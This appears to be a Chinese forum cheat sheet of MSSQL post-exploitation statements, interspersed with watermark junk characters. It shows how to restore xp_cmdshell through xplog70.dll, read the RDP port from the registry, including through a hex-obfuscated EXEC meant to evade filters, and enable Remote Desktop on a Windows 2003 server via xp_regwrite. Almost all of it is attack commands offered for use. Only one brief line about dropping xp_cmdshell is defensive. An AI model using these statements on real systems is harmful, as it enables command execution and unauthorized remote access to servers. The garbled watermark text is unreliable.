| 低调求发展 – 潜心习安全/ B. i m% P7 D% S/ v
—————————–( G. O6 `) K% i! k
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' – 低调求发展 – 老牌第三方民间网络安全交流平台+ l3 L- j5 {' l2 c
T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security$ b* h G( z3 Q3 t B2 @( Z
开启cmdshell的sql语句
| 低调求发展 – 潜心习安全- B }4 R8 f+ o) X, b8 G
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security! Q6 q9 |$ i* ?* k
返回结果为1就okwww.t00ls.net2 [5 h+ r/ {; \- A
– 低调求发展 – 老牌第三方民间网络安全交流平台4 q” I( b1 c; F1 S1 g/ d8 P8 o) [9 B* r
恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就okT00LS7 A% o; ^/ e; D5 g; e$ {0 A
T00LS: }: v# m. L% x7 a
否则上传xplog7.0.dll | 低调求发展 – 潜心习安全3 T6 a( k' ^( |1 g/ S, y( M
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll', j, |5 z$ v( b! K7 ^* i3 J3 B
| 低调求发展 – 潜心习安全3 H- j+ v5 u# p9 t. u0 J! j
堵上cmdshell的sql语句 | 低调求发展 – 潜心习安全; F0 p; R, B- \6 X; n+ X& U
sp_dropextendedproc “xp_cmdshell – 低调求发展 – 老牌第三方民间网络安全交流平台, Y! J' Z$ E$ U: ?2 A. i5 g
读3389端口
regedit /e port.reg “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” – 低调求发展 – 老牌第三方民间网络安全交流平台1 P9 j1 z! t5 y+ J5 G2 |0 h
然后 type port.reg | find “PortNumber” | 低调求发展 – 潜心习安全1 K0 D0 [3 ]3 G3 {6 R
sql 语句
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
declare @s varchar(4000) set @s=cast(0x65786563206D61737465722E2E78705F726567726561642027484B45595F4C4F43414C5F4D414348494E45272C2753595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D546370272C27506F72744E756D62657227 as varchar(4000));exec(@s); —
www.t00ls.net' x. }* _, ~7 |* i C/ ~9 m
1 R1 l) P( ^+ u+ v
开启2003的终端(sa) | 低调求发展 – 潜心习安全* n- C4 y) }$ w; W$ h: U8 ?” A
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server', 'fDenyTSConnections','REG_DWORD','0'
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;– |
